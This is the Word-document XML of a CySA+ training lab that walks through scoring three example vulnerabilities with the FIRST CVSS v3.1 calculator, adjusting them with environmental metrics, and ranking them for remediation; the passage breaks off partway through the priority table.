    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will score three vulnerabilities with the FIRST CVSS v3.1 calculator, apply environmental context, and produce a prioritised remediation list. This is exam-blueprint CySA+ 2.3 (CVSS interpretation, Context awareness, Asset value, Zero-day).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The work is done in the browser plus a small CSV — no shell required.</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Web — FIRST CVSS v3.1 Calculator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Open the CVSS v3.1 calculator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Browser: https://www.first.org/cvss/calculator/3.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The calculator has three sections:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Base — intrinsic properties of the vuln</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Temporal — exploit code maturity, remediation level</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Environmental — your context (asset value, mitigations)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Memorise the eight Base metrics</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fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>What it means</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AV Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>N / A / L / P</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Network / Adjacent / Local / Physical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AC Attack Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>L / H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low / High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PR Privileges Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>N / L / H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None / Low / High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UI User Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>N / R</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None / Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>U / C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Unchanged / Changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>C Confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>N / L / H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>I Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>N / L / H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>N / L / H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These are CySA+ 2.3's bullet points: Attack vectors, Attack complexity, Privileges required, User interaction, Scope, Impact (C/I/A).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Score Vuln #1 — Unauthenticated RCE on a public web server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Settings: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Base score: 9.8 Critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector string copied from the calculator:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Score Vuln #2 — Local privilege escalation on a workstation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Settings: AV:L / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Base score: 7.8 High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Score Vuln #3 — Reflected XSS that requires a click</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Settings: AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Base score: 6.1 Medium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Apply Environmental metrics (context awareness)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CySA+ 2.3 calls out internal / external / isolated and asset value. The Environmental section lets you push or pull the score:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vuln #1 lives on an internet-facing payment server → set Confidentiality Requirement = High → modified score stays Critical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vuln #2 lives on an isolated air-gapped lab VM → Confidentiality Req = Low, Modified Attack Vector = Physical → score drops to ~4.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vuln #3 lives on a public marketing site with no PII → score effectively low.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The environmental score is the one you use for prioritization — never the raw base score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Build the prioritised list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Save as /tmp/prio.csv (open a shell on Killercoda or your laptop):</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58"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE / Vuln</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exploit known?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Asset value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Final priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes (Exploit-DB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Critical (revenue)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Patch within 24 h</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Local privesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1358"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
